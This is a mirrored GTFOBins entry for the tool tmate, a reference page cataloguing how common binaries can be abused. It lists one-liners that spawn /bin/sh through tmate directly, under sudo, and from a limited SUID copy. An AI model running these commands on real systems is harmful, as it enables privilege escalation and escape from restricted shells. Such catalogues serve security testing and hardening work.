mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
10 lines
146 B
Markdown
10 lines
146 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: tmate -c /bin/sh
|
|
sudo:
|
|
- code: sudo tmate -c /bin/sh
|
|
limited-suid:
|
|
- code: ./tmate -c /bin/sh
|
|
---
|